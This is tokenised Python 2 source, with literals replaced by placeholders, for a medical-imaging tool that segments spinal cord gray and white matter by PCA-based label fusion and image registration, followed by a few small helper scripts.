pca_data [ <NUM_LIT:0> ] , eig_pairs = pca_data [ <NUM_LIT:1> ] , k = k ) <EOL> self . dictionary . mean_image = self . pca . mean_image <EOL> self . epsilon = round ( <NUM_LIT:1.0> / self . dictionary . J , <NUM_LIT:4> ) / <NUM_LIT:2> <EOL> if self . param . todo_model == '<STR_LIT>' : <EOL> self . tau = self . compute_tau ( ) <EOL> pickle . dump ( self . tau , open ( self . param . model_dir + '<STR_LIT>' , '<STR_LIT:w>' ) , protocol = <NUM_LIT:0> ) <EOL> elif self . param . todo_model == '<STR_LIT>' : <EOL> self . tau = pickle . load ( open ( self . param . path_dictionary + '<STR_LIT>' , '<STR_LIT:r>' ) ) <EOL> if self . param . verbose == <NUM_LIT:2> : <EOL> self . pca . plot_projected_dic ( ) <EOL> def compute_beta ( self , coord_target , target_levels = None , dataset_coord = None , dataset_levels = None , tau = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if dataset_coord is None : <EOL> dataset_coord = self . pca . dataset_coord . T <EOL> dataset_levels = [ dic_slice . level for dic_slice in self . dictionary . slices ] <EOL> beta = [ ] <EOL> if self . param . mode_weight_similarity : <EOL> mode_weight = [ val / sum ( self . pca . kept_eigenval ) for val in self . pca . kept_eigenval ] <EOL> else : <EOL> mode_weight = None <EOL> if isinstance ( coord_target [ <NUM_LIT:0> ] , ( list , np . ndarray ) ) : <EOL> for i_target , coord_projected_slice in enumerate ( coord_target ) : <EOL> beta_slice = [ ] <EOL> for j_slice , coord_slice_j in enumerate ( dataset_coord ) : <EOL> if mode_weight is None : <EOL> square_norm = np . linalg . norm ( ( coord_projected_slice - coord_slice_j ) , <NUM_LIT:2> ) <EOL> else : <EOL> from scipy . spatial . distance import wminkowski <EOL> square_norm = wminkowski ( coord_projected_slice , coord_slice_j , <NUM_LIT:2> , mode_weight ) <EOL> if target_levels is not None and target_levels is not [ None ] and self . param . use_levels : <EOL> if self . param . equation_id == <NUM_LIT:1> : <EOL> beta_slice . append ( exp ( - self . param . weight_gamma * abs ( target_levels [ i_target ] - dataset_levels [ j_slice ] ) ) * exp ( - tau * square_norm ) ) <EOL> elif self . param . equation_id == <NUM_LIT:2> : <EOL> if target_levels [ i_target ] == dataset_levels [ j_slice ] : <EOL> beta_slice . append ( exp ( tau * square_norm ) ) <EOL> else : <EOL> beta_slice . append ( exp ( - tau * square_norm ) / self . param . weight_gamma * abs ( target_levels [ i_target ] - dataset_levels [ j_slice ] ) ) <EOL> else : <EOL> beta_slice . append ( exp ( - tau * square_norm ) ) <EOL> try : <EOL> beta_slice /= np . sum ( beta_slice ) <EOL> except ZeroDivisionError : <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> print beta_slice <EOL> beta . append ( beta_slice ) <EOL> else : <EOL> for j_slice , coord_slice_j in enumerate ( dataset_coord ) : <EOL> if mode_weight is None : <EOL> square_norm = np . linalg . norm ( ( coord_target - coord_slice_j ) , <NUM_LIT:2> ) <EOL> else : <EOL> from scipy . spatial . distance import wminkowski <EOL> square_norm = wminkowski ( coord_target , coord_slice_j , <NUM_LIT:2> , mode_weight ) <EOL> if target_levels is not None and self . param . use_levels : <EOL> '''<STR_LIT>''' <EOL> beta . append ( exp ( - self . param . weight_gamma * abs ( target_levels - dataset_levels [ j_slice ] ) ) * exp ( - tau * square_norm ) ) <EOL> else : <EOL> beta . append ( exp ( - tau * square_norm ) ) <EOL> try : <EOL> beta /= np . sum ( beta ) <EOL> except ZeroDivisionError : <EOL> sct . printv ( '<STR_LIT>' , self . param . verbose , '<STR_LIT>' ) <EOL> print beta <EOL> return np . asarray ( beta ) <EOL> def compute_tau ( self ) : <EOL> """<STR_LIT>""" <EOL> sct . printv ( '<STR_LIT>' <EOL> '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> from scipy . optimize import minimize <EOL> def to_minimize ( tau ) : <EOL> """<STR_LIT>""" <EOL> sum_norm = <NUM_LIT:0> <EOL> for dic_slice in self . dictionary . slices : <EOL> projected_dic_slice_coord = self . pca . project_array ( dic_slice . im_M_flat ) <EOL> coord_dic_slice_dataset = np . delete ( self . pca . dataset_coord . T , dic_slice . id , <NUM_LIT:0> ) <EOL> if self . param . use_levels : <EOL> dic_slice_dataset_levels = np . delete ( np . asarray ( dic_levels ) , dic_slice . id , <NUM_LIT:0> ) <EOL> beta_dic_slice = self . compute_beta ( projected_dic_slice_coord , target_levels = dic_slice . level , dataset_coord = coord_dic_slice_dataset , dataset_levels = dic_slice_dataset_levels , tau = tau ) <EOL> else : <EOL> beta_dic_slice = self . compute_beta ( projected_dic_slice_coord , target_levels = None , dataset_coord = coord_dic_slice_dataset , dataset_levels = None , tau = tau ) <EOL> kj = self . select_k_slices ( beta_dic_slice ) <EOL> if self . param . weight_label_fusion : <EOL> est_segm_j = self . label_fusion ( dic_slice , kj , beta = beta_dic_slice ) [ <NUM_LIT:0> ] <EOL> else : <EOL> est_segm_j = self . label_fusion ( dic_slice , kj ) [ <NUM_LIT:0> ] <EOL> sum_norm += l0_norm ( dic_slice . wm_seg_M , est_segm_j . data ) <EOL> return sum_norm <EOL> dic_levels = [ dic_slice . level for dic_slice in self . dictionary . slices ] <EOL> est_tau = minimize ( to_minimize , <NUM_LIT> , method = '<STR_LIT>' , options = { '<STR_LIT>' : <NUM_LIT> } ) <EOL> sct . printv ( '<STR_LIT>' + str ( est_tau . x [ <NUM_LIT:0> ] ) ) <EOL> return float ( est_tau . x [ <NUM_LIT:0> ] ) <EOL> def select_k_slices ( self , beta ) : <EOL> """<STR_LIT>""" <EOL> kept_slice_index = [ ] <EOL> if isinstance ( beta [ <NUM_LIT:0> ] , ( list , np . ndarray ) ) : <EOL> for beta_slice in beta : <EOL> selected_index = beta_slice > self . epsilon <EOL> kept_slice_index . append ( selected_index ) <EOL> else : <EOL> kept_slice_index = beta > self . epsilon <EOL> return np . asarray ( kept_slice_index ) <EOL> def label_fusion ( self , target , selected_index , beta = None , type = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> wm_segmentation_slices = np . asarray ( [ dic_slice . wm_seg_M for dic_slice in self . dictionary . slices ] ) <EOL> gm_segmentation_slices = np . asarray ( [ dic_slice . gm_seg_M for dic_slice in self . dictionary . slices ] ) <EOL> res_wm_seg_model_space = [ ] <EOL> res_gm_seg_model_space = [ ] <EOL> if isinstance ( selected_index [ <NUM_LIT:0> ] , ( list , np . ndarray ) ) : <EOL> for i , selected_ind_by_slice in enumerate ( selected_index ) : <EOL> if beta is None : <EOL> n_selected_dic_slices = wm_segmentation_slices [ selected_ind_by_slice ] . shape [ <NUM_LIT:0> ] <EOL> weights = [ <NUM_LIT:1.0> / n_selected_dic_slices ] * n_selected_dic_slices <EOL> else : <EOL> weights = beta [ i ] [ selected_ind_by_slice ] <EOL> weights = [ w / sum ( weights ) for w in weights ] <EOL> wm_slice_seg = compute_majority_vote_mean_seg ( wm_segmentation_slices [ selected_ind_by_slice ] , weights = weights , type = type , threshold = <NUM_LIT> ) <EOL> res_wm_seg_model_space . append ( wm_slice_seg ) <EOL> target [ i ] . set ( wm_seg_m = wm_slice_seg ) <EOL> gm_slice_seg = compute_majority_vote_mean_seg ( gm_segmentation_slices [ selected_ind_by_slice ] , weights = weights , type = type ) <EOL> res_gm_seg_model_space . append ( gm_slice_seg ) <EOL> target [ i ] . set ( gm_seg_m = gm_slice_seg ) <EOL> else : <EOL> if beta is None : <EOL> n_selected_dic_slices = wm_segmentation_slices [ selected_index ] . shape [ <NUM_LIT:0> ] <EOL> weights = [ <NUM_LIT:1.0> / n_selected_dic_slices ] * n_selected_dic_slices <EOL> else : <EOL> weights = beta [ selected_index ] <EOL> weights = [ w / sum ( weights ) for w in weights ] <EOL> res_wm_seg_model_space = compute_majority_vote_mean_seg ( wm_segmentation_slices [ selected_index ] , weights = weights , type = type , threshold = <NUM_LIT> ) <EOL> res_gm_seg_model_space = compute_majority_vote_mean_seg ( gm_segmentation_slices [ selected_index ] , weights = weights , type = type ) <EOL> res_wm_seg_model_space = np . asarray ( res_wm_seg_model_space ) <EOL> res_gm_seg_model_space = np . asarray ( res_gm_seg_model_space ) <EOL> return Image ( param = res_wm_seg_model_space ) , Image ( param = res_gm_seg_model_space ) <EOL> class TargetSegmentationPairwise : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , target_image = None , levels_image = None , epsilon = None ) : <EOL> """<STR_LIT>""" <EOL> self . model = model <EOL> if len ( target_image . data . shape ) == <NUM_LIT:3> : <EOL> self . target = [ Slice ( slice_id = i_slice , im = target_slice , reg_to_m = [ ] ) for i_slice , target_slice in enumerate ( target_image . data ) ] <EOL> self . target_dim = <NUM_LIT:3> <EOL> elif len ( target_image . data . shape ) == <NUM_LIT:2> : <EOL> self . target = [ Slice ( slice_id = <NUM_LIT:0> , im = target_image . data , reg_to_m = [ ] ) ] <EOL> self . target_dim = <NUM_LIT:2> <EOL> if levels_image is not None and self . model . param . use_levels : <EOL> self . load_level ( levels_image ) <EOL> if self . model . param . first_reg : <EOL> self . first_reg ( ) <EOL> self . target_pairwise_registration ( ) <EOL> sct . printv ( '<STR_LIT>' , model . param . verbose , '<STR_LIT>' ) <EOL> self . coord_projected_target = model . pca . project ( [ target_slice . im_M for target_slice in self . target ] ) <EOL> sct . printv ( '<STR_LIT>' , model . param . verbose , '<STR_LIT>' ) <EOL> if levels_image is not None and self . model . param . use_levels : <EOL> self . beta = self . model . compute_beta ( self . coord_projected_target , target_levels = np . asarray ( [ target_slice . level for target_slice in self . target ] ) , tau = self . model . tau ) <EOL> else : <EOL> self . beta = self . model . compute_beta ( self . coord_projected_target , tau = self . model . tau ) <EOL> sct . printv ( '<STR_LIT>' , model . param . verbose , '<STR_LIT>' ) <EOL> self . selected_k_slices = self . model . select_k_slices ( self . beta ) <EOL> self . save_selected_slices ( target_image . file_name [ : - <NUM_LIT:3> ] ) <EOL> if self . model . param . verbose == <NUM_LIT:2> : <EOL> self . plot_projected_dic ( nb_modes = <NUM_LIT:3> , to_highlight = '<STR_LIT:all>' ) <EOL> sct . printv ( '<STR_LIT>' , model . param . verbose , '<STR_LIT>' ) <EOL> if self . model . param . weight_label_fusion : <EOL> use_beta = self . beta <EOL> else : <EOL> use_beta = None <EOL> self . model . label_fusion ( self . target , self . selected_k_slices , beta = use_beta , type = self . model . param . res_type ) <EOL> if self . model . param . z_regularisation : <EOL> sct . printv ( '<STR_LIT>' , model . param . verbose , '<STR_LIT>' ) <EOL> self . z_regularisation_2d_iteration ( ) <EOL> sct . printv ( '<STR_LIT>' , <EOL> model . param . verbose , '<STR_LIT>' ) <EOL> self . target_pairwise_registration ( inverse = True ) <EOL> def load_level ( self , level_image ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( level_image , Image ) : <EOL> nz_coord = level_image . getNonZeroCoordinates ( ) <EOL> for i_level_slice , level_slice in enumerate ( level_image . data ) : <EOL> nz_val = [ ] <EOL> for coord in nz_coord : <EOL> if coord . x == i_level_slice : <EOL> nz_val . append ( level_slice [ coord . y , coord . z ] ) <EOL> try : <EOL> self . target [ i_level_slice ] . set ( level = int ( round ( sum ( nz_val ) / len ( nz_val ) ) ) ) <EOL> except ZeroDivisionError : <EOL> sct . printv ( '<STR_LIT>' + str ( i_level_slice ) + '<STR_LIT>' , self . model . param . verbose , '<STR_LIT>' ) <EOL> self . target [ i_level_slice ] . set ( level = <NUM_LIT:0> ) <EOL> elif isinstance ( level_image , str ) : <EOL> self . target [ <NUM_LIT:0> ] . set ( level = get_key_from_val ( self . model . dictionary . level_label , level_image . upper ( ) ) ) <EOL> def first_reg ( self ) : <EOL> """<STR_LIT>""" <EOL> mean_sc_seg = ( np . asarray ( self . model . pca . mean_image ) > <NUM_LIT:0> ) . astype ( int ) <EOL> save_image ( self . model . pca . mean_image , '<STR_LIT>' ) <EOL> for i , target_slice in enumerate ( self . target ) : <EOL> moving_target_seg = ( np . asarray ( target_slice . im ) > <NUM_LIT:0> ) . astype ( int ) <EOL> transfo = '<STR_LIT>' <EOL> transfo_name = transfo + '<STR_LIT>' + str ( i ) + find_ants_transfo_name ( transfo ) [ <NUM_LIT:0> ] <EOL> apply_ants_transfo ( mean_sc_seg , moving_target_seg , binary = True , apply_transfo = False , transfo_type = transfo , transfo_name = transfo_name , metric = self . model . param . reg_metric ) <EOL> moved_target_slice = apply_ants_transfo ( mean_sc_seg , target_slice . im , binary = False , search_reg = False , transfo_type = transfo , transfo_name = transfo_name , metric = self . model . param . reg_metric ) <EOL> target_slice . set ( im_m = moved_target_slice ) <EOL> target_slice . reg_to_M . append ( ( transfo , transfo_name ) ) <EOL> save_image ( target_slice . im , '<STR_LIT>' + str ( target_slice . id ) + '<STR_LIT>' ) <EOL> save_image ( target_slice . im_M , '<STR_LIT>' + str ( target_slice . id ) + '<STR_LIT>' ) <EOL> def target_pairwise_registration ( self , inverse = False ) : <EOL> """<STR_LIT>""" <EOL> if not inverse : <EOL> mean_dic_im = self . model . pca . mean_image <EOL> for i , target_slice in enumerate ( self . target ) : <EOL> if not self . model . param . first_reg : <EOL> moving_target_slice = target_slice . im <EOL> else : <EOL> moving_target_slice = target_slice . im_M <EOL> for transfo in self . model . dictionary . coregistration_transfos : <EOL> transfo_name = transfo + '<STR_LIT>' + str ( i ) + find_ants_transfo_name ( transfo ) [ <NUM_LIT:0> ] <EOL> target_slice . reg_to_M . append ( ( transfo , transfo_name ) ) <EOL> moving_target_slice = apply_ants_transfo ( mean_dic_im , moving_target_slice , binary = False , transfo_type = transfo , transfo_name = transfo_name , metric = self . model . param . reg_metric ) <EOL> self . target [ i ] . set ( im_m = moving_target_slice ) <EOL> else : <EOL> for i , target_slice in enumerate ( self . target ) : <EOL> moving_wm_seg_slice = target_slice . wm_seg_M <EOL> moving_gm_seg_slice = target_slice . gm_seg_M <EOL> for transfo in target_slice . reg_to_M : <EOL> if self . model . param . res_type == '<STR_LIT>' : <EOL> bin = True <EOL> else : <EOL> bin = False <EOL> moving_wm_seg_slice = apply_ants_transfo ( self . model . dictionary . mean_seg , moving_wm_seg_slice , search_reg = False , binary = bin , inverse = <NUM_LIT:1> , transfo_type = transfo [ <NUM_LIT:0> ] , transfo_name = transfo [ <NUM_LIT:1> ] , metric = self . model . param . reg_metric ) <EOL> moving_gm_seg_slice = apply_ants_transfo ( self . model . dictionary . mean_seg , moving_gm_seg_slice , search_reg = False , binary = bin , inverse = <NUM_LIT:1> , transfo_type = transfo [ <NUM_LIT:0> ] , transfo_name = transfo [ <NUM_LIT:1> ] , metric = self . model . param . reg_metric ) <EOL> target_slice . set ( wm_seg = moving_wm_seg_slice ) <EOL> target_slice . set ( gm_seg = moving_gm_seg_slice ) <EOL> def z_regularisation_2d_iteration ( self , coeff = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> for i , target_slice in enumerate ( self . target [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) : <EOL> adjacent_wm_seg = [ ] <EOL> adjacent_gm_seg = [ ] <EOL> precision = <NUM_LIT:100> <EOL> print int ( precision * coeff ) <EOL> for k in range ( int ( precision * coeff ) ) : <EOL> adjacent_wm_seg . append ( self . target [ i - <NUM_LIT:1> ] . wm_seg_M ) <EOL> adjacent_wm_seg . append ( self . target [ i + <NUM_LIT:1> ] . wm_seg_M ) <EOL> adjacent_gm_seg . append ( self . target [ i - <NUM_LIT:1> ] . gm_seg_M ) <EOL> adjacent_gm_seg . append ( self . target [ i + <NUM_LIT:1> ] . gm_seg_M ) <EOL> for k in range ( precision - <NUM_LIT:2> * int ( precision * coeff ) ) : <EOL> adjacent_wm_seg . append ( target_slice . wm_seg_M ) <EOL> adjacent_gm_seg . append ( target_slice . gm_seg_M ) <EOL> adjacent_wm_seg = np . asarray ( adjacent_wm_seg ) <EOL> adjacent_gm_seg = np . asarray ( adjacent_gm_seg ) <EOL> new_wm_seg = compute_majority_vote_mean_seg ( adjacent_wm_seg , type = self . model . param . res_type , threshold = <NUM_LIT> ) <EOL> new_gm_seg = compute_majority_vote_mean_seg ( adjacent_gm_seg , type = self . model . param . res_type ) <EOL> target_slice . set ( wm_seg_m = new_wm_seg ) <EOL> target_slice . set ( gm_seg_m = new_gm_seg ) <EOL> def plot_projected_dic ( self , nb_modes = <NUM_LIT:3> , to_highlight = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . model . pca . plot_projected_dic ( nb_modes = nb_modes , target_coord = self . coord_projected_target , target_levels = [ t_slice . level for t_slice in self . target ] ) if self . coord_projected_target is not None else self . model . pca . plot_projected_dic ( nb_modes = nb_modes ) <EOL> if to_highlight == '<STR_LIT:all>' : <EOL> for i in range ( len ( self . target ) ) : <EOL> self . model . pca . plot_projected_dic ( nb_modes = nb_modes , target_coord = self . coord_projected_target , target_levels = [ t_slice . level for t_slice in self . target ] , to_highlight = ( i , self . selected_k_slices [ i ] ) ) <EOL> else : <EOL> self . model . pca . plot_projected_dic ( nb_modes = nb_modes , target_coord = self . coord_projected_target , target_levels = [ t_slice . level for t_slice in self . target ] , to_highlight = ( to_highlight , self . selected_k_slices [ to_highlight ] ) ) if self . coord_projected_target is not None else self . model . pca . plot_projected_dic ( ) <EOL> def save_selected_slices ( self , target_name ) : <EOL> slice_levels = np . asarray ( [ ( dic_slice . id , self . model . dictionary . level_label [ dic_slice . level ] ) for dic_slice in self . model . dictionary . slices ] ) <EOL> fic_selected_slices = open ( target_name + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> if self . target_dim == <NUM_LIT:2> : <EOL> fic_selected_slices . write ( str ( slice_levels [ self . selected_k_slices . reshape ( self . model . dictionary . J , ) ] ) ) <EOL> elif self . target_dim == <NUM_LIT:3> : <EOL> for target_slice in self . target : <EOL> fic_selected_slices . write ( '<STR_LIT>' + str ( target_slice . id ) + '<STR_LIT>' + str ( slice_levels [ self . selected_k_slices [ target_slice . id ] ] ) + '<STR_LIT:\n>' ) <EOL> fic_selected_slices . close ( ) <EOL> class GMsegSupervisedMethod ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , target_fname , level_fname , model , gm_seg_param = None ) : <EOL> self . model = model <EOL> sct . printv ( '<STR_LIT>' , verbose = gm_seg_param . verbose , type = '<STR_LIT>' ) <EOL> self . target_image = Image ( target_fname ) <EOL> original_hdr = self . target_image . hdr <EOL> level_im = None <EOL> if level_fname is not None : <EOL> if len ( level_fname ) < <NUM_LIT:3> : <EOL> level_im = level_fname <EOL> else : <EOL> level_im = Image ( level_fname ) <EOL> if level_im is not None : <EOL> self . target_seg_methods = TargetSegmentationPairwise ( self . model , target_image = self . target_image , levels_image = level_im ) <EOL> else : <EOL> self . target_seg_methods = TargetSegmentationPairwise ( self . model , target_image = self . target_image ) <EOL> suffix = '<STR_LIT:_>' <EOL> suffix += '<STR_LIT:_>' + gm_seg_param . res_type <EOL> for transfo in self . model . dictionary . coregistration_transfos : <EOL> suffix += '<STR_LIT:_>' + transfo <EOL> if self . model . param . use_levels : <EOL> suffix += '<STR_LIT>' + str ( self . model . param . weight_gamma ) <EOL> else : <EOL> suffix += '<STR_LIT>' <EOL> if self . model . param . z_regularisation : <EOL> suffix += '<STR_LIT>' <EOL> name_res_wmseg = sct . extract_fname ( target_fname ) [ <NUM_LIT:1> ] + '<STR_LIT>' + suffix <EOL> name_res_gmseg = sct . extract_fname ( target_fname ) [ <NUM_LIT:1> ] + '<STR_LIT>' + suffix <EOL> if len ( self . target_seg_methods . target ) == <NUM_LIT:1> : <EOL> self . res_wm_seg = Image ( param = np . asarray ( self . target_seg_methods . target [ <NUM_LIT:0> ] . wm_seg ) , absolutepath = name_res_wmseg + '<STR_LIT>' ) <EOL> self . res_gm_seg = Image ( param = np . asarray ( self . target_seg_methods . target [ <NUM_LIT:0> ] . gm_seg ) , absolutepath = name_res_gmseg + '<STR_LIT>' ) <EOL> else : <EOL> self . res_wm_seg = Image ( param = np . asarray ( [ target_slice . wm_seg for target_slice in self . target_seg_methods . target ] ) , absolutepath = name_res_wmseg + '<STR_LIT>' ) <EOL> self . res_gm_seg = Image ( param = np . asarray ( [ target_slice . gm_seg for target_slice in self . target_seg_methods . target ] ) , absolutepath = name_res_gmseg + '<STR_LIT>' ) <EOL> self . res_wm_seg . hdr = original_hdr <EOL> self . res_wm_seg . file_name = name_res_wmseg <EOL> self . res_wm_seg . save ( type = '<STR_LIT>' ) <EOL> self . res_gm_seg . hdr = original_hdr <EOL> self . res_gm_seg . file_name = name_res_gmseg <EOL> self . res_gm_seg . save ( type = '<STR_LIT>' ) <EOL> self . corrected_wm_seg = correct_wmseg ( self . res_gm_seg , self . target_image , name_res_wmseg , original_hdr ) <EOL> def show ( self ) : <EOL> sct . printv ( '<STR_LIT>' ) <EOL> self . model . pca . show_all_modes ( ) <EOL> sct . printv ( '<STR_LIT>' ) <EOL> self . target_seg_methods . plot_projected_dic ( nb_modes = <NUM_LIT:3> ) <EOL> sct . printv ( '<STR_LIT>' ) <EOL> self . model . pca . show_mode_variation ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> param = Param ( ) <EOL> input_target_fname = None <EOL> input_level_fname = None <EOL> if param . debug : <EOL> print '<STR_LIT>' <EOL> fname_input = param . path_dictionary + "<STR_LIT>" <EOL> fname_input = param . path_dictionary + "<STR_LIT>" <EOL> else : <EOL> param_default = Param ( ) <EOL> parser = Parser ( __file__ ) <EOL> parser . usage . set_description ( '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> mandatory = False , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> example = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:str>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = [ [ '<STR_LIT:U+002C>' ] , '<STR_LIT:str>' ] , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = [ '<STR_LIT>' ] , <EOL> example = [ '<STR_LIT>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT:float>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT> , <EOL> example = <NUM_LIT> ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:1> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:1> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT>' , <EOL> example = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' , '<STR_LIT:2>' ] ) <EOL> arguments = parser . parse ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> param . path_dictionary = arguments [ "<STR_LIT>" ] <EOL> param . todo_model = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> input_target_fname = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . reg = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> input_level_fname = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . weight_gamma = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . use_levels = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . weight_label_fusion = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . mode_weight_similarity = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . z_regularisation = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . target_denoising = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . first_reg = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . res_type = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . verbose = int ( arguments [ "<STR_LIT>" ] ) <EOL> model = Model ( model_param = param , k = <NUM_LIT> ) <EOL> if input_target_fname is not None : <EOL> gm_seg_method = GMsegSupervisedMethod ( input_target_fname , input_level_fname , model , gm_seg_param = param ) <EOL> print param . verbose == <NUM_LIT:2> <EOL> if param . verbose == <NUM_LIT:2> : <EOL> gm_seg_method . show ( ) </s>
<s> import commands , sys , os <EOL> status , path_sct = commands . getstatusoutput ( '<STR_LIT>' ) <EOL> sys . path . append ( path_sct + '<STR_LIT>' ) <EOL> import nibabel <EOL> from scipy . misc import imsave <EOL> from sct_utils import extract_fname <EOL> os . chdir ( '<STR_LIT>' ) <EOL> dirpath = [ x [ <NUM_LIT:0> ] for x in os . walk ( '<STR_LIT>' ) ] <EOL> dirnames = [ x [ <NUM_LIT:1> ] for x in os . walk ( '<STR_LIT>' ) ] <EOL> filenames = [ x [ <NUM_LIT:2> ] for x in os . walk ( '<STR_LIT>' ) ] <EOL> L = len ( dirpath ) <EOL> dirpath_simplified = [ ] <EOL> for i in range ( <NUM_LIT:0> , L ) : <EOL> if dirpath [ i ] . find ( '<STR_LIT>' ) == - <NUM_LIT:1> : <EOL> dirpath_simplified . append ( dirpath [ i ] ) <EOL> for i in range ( <NUM_LIT:3> , L , <NUM_LIT:4> ) : <EOL> files = os . listdir ( dirpath [ i ] ) <EOL> os . chdir ( dirpath [ i ] ) <EOL> for file in files : <EOL> if file == '<STR_LIT>' or file == '<STR_LIT>' : <EOL> path , name , ext = extract_fname ( file ) <EOL> uploaded_file = nibabel . load ( file ) <EOL> data = uploaded_file . get_data ( ) <EOL> middle_sag = round ( data . shape [ <NUM_LIT:1> ] / <NUM_LIT:2> ) <EOL> data_sagitale = data [ : , middle_sag , : ] <EOL> imsave ( '<STR_LIT>' + name + '<STR_LIT>' , data_sagitale ) <EOL> os . chdir ( '<STR_LIT>' ) </s>
<s> import os , sys , commands <EOL> status , path_sct = commands . getstatusoutput ( '<STR_LIT>' ) <EOL> sys . path . append ( path_sct + '<STR_LIT>' ) <EOL> from msct_register_landmarks import getRigidTransformFromImages <EOL> from msct_register_regularized import generate_warping_field <EOL> os . chdir ( '<STR_LIT>' ) <EOL> rotation_matrix , translation_array = getRigidTransformFromImages ( '<STR_LIT>' , '<STR_LIT>' , constraints = '<STR_LIT>' , metric = '<STR_LIT>' , center_rotation = '<STR_LIT>' ) <EOL> print '<STR_LIT>' + str ( rotation_matrix [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) + '<STR_LIT:U+002CU+0020>' + str ( rotation_matrix [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) </s>
<s> from commands import getstatusoutput <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> status , output = getstatusoutput ( '<STR_LIT>' ) <EOL> if status : <EOL> print '<STR_LIT>' + output <EOL> else : <EOL> print output <EOL> print '<STR_LIT>' <EOL> status , output = getstatusoutput ( '<STR_LIT>' ) <EOL> if status : <EOL> print '<STR_LIT>' + output <EOL> else : <EOL> print output </s>
